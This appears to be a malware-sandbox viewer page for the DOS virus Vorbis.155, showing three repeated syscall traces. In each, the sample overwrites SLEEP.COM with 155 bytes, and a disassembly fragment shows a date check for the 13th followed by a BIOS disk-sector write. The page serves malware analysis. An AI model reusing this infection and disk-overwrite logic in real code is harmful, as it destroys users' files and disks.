Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Vorbis.155

Time	Syscall Op	Syscall Name
2018-12-17T22:43:28.988657227Z	78	PC: 12a71 \| Find first file
2018-12-17T22:43:28.995536675Z	61	PC: 12a81 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:43:29.015610232Z	64	PC: 12a92 \| Write file or device (Write 155 bytes on handle 5)
2018-12-17T22:43:29.023134388Z	62	PC: 12a9a \| Close file
2018-12-17T22:43:29.038877902Z	59	PC: 12ab3 \| Change current directory
2018-12-17T22:43:29.045118155Z	42	PC: 12ac4 \| Get date 0x12ac4: cmp dl, 0xd 0x12ac7: je 0x12acb 0x12ac9: int 0x20 0x12acb: mov al, 0x9e 0x12acd: mov ah, 3 0x12acf: mov dl, 2 0x12ad1: mov cx, 0 0x12ad4: mov bx, 0x103 0x12ad7: int 0x13 0x12ad9: jmp 0x12ac9 0x12adb: int 0x21 0x12add: jmp 0x12aec 0x12adf: mov dl, byte ptr [bx] 0x12ae1: or dl, dl 0x12ae3: je 0x12aec 0x12ae5: mov ah, 2 0x12ae7: int 0x21 0x12ae9: inc bx 0x12aea: jmp 0x12adf 0x12aec: pop cx

Time	Syscall Op	Syscall Name
2018-12-25T12:02:53.922229682Z	78	PC: 12a71 \| Find first file
2018-12-25T12:02:53.927833993Z	61	PC: 12a81 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:53.932096305Z	64	PC: 12a92 \| Write file or device (Write 155 bytes on handle 5)
2018-12-25T12:02:53.936893476Z	62	PC: 12a9a \| Close file
2018-12-25T12:02:53.954360312Z	59	PC: 12ab3 \| Change current directory
2018-12-25T12:02:53.969285964Z	42	PC: 12ac4 \| Get date 0x12ac4: cmp dl, 0xd 0x12ac7: je 0x12acb 0x12ac9: int 0x20 0x12acb: mov al, 0x9e 0x12acd: mov ah, 3 0x12acf: mov dl, 2 0x12ad1: mov cx, 0 0x12ad4: mov bx, 0x103 0x12ad7: int 0x13 0x12ad9: jmp 0x12ac9 0x12adb: int 0x21 0x12add: jmp 0x12aec 0x12adf: mov dl, byte ptr [bx] 0x12ae1: or dl, dl 0x12ae3: je 0x12aec 0x12ae5: mov ah, 2 0x12ae7: int 0x21 0x12ae9: inc bx 0x12aea: jmp 0x12adf 0x12aec: pop cx

Time	Syscall Op	Syscall Name
2018-12-25T12:02:53.968448172Z	78	PC: 12a71 \| Find first file
2018-12-25T12:02:53.974938304Z	61	PC: 12a81 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:02:53.981477943Z	64	PC: 12a92 \| Write file or device (Write 155 bytes on handle 5)
2018-12-25T12:02:53.988302764Z	62	PC: 12a9a \| Close file
2018-12-25T12:02:54.003532309Z	59	PC: 12ab3 \| Change current directory
2018-12-25T12:02:54.007847351Z	42	PC: 12ac4 \| Get date 0x12ac4: cmp dl, 0xd 0x12ac7: je 0x12acb 0x12ac9: int 0x20 0x12acb: mov al, 0x9e 0x12acd: mov ah, 3 0x12acf: mov dl, 2 0x12ad1: mov cx, 0 0x12ad4: mov bx, 0x103 0x12ad7: int 0x13 0x12ad9: jmp 0x12ac9 0x12adb: int 0x21 0x12add: jmp 0x12aec 0x12adf: mov dl, byte ptr [bx] 0x12ae1: or dl, dl 0x12ae3: je 0x12aec 0x12ae5: mov ah, 2 0x12ae7: int 0x21 0x12ae9: inc bx 0x12aea: jmp 0x12adf 0x12aec: pop cx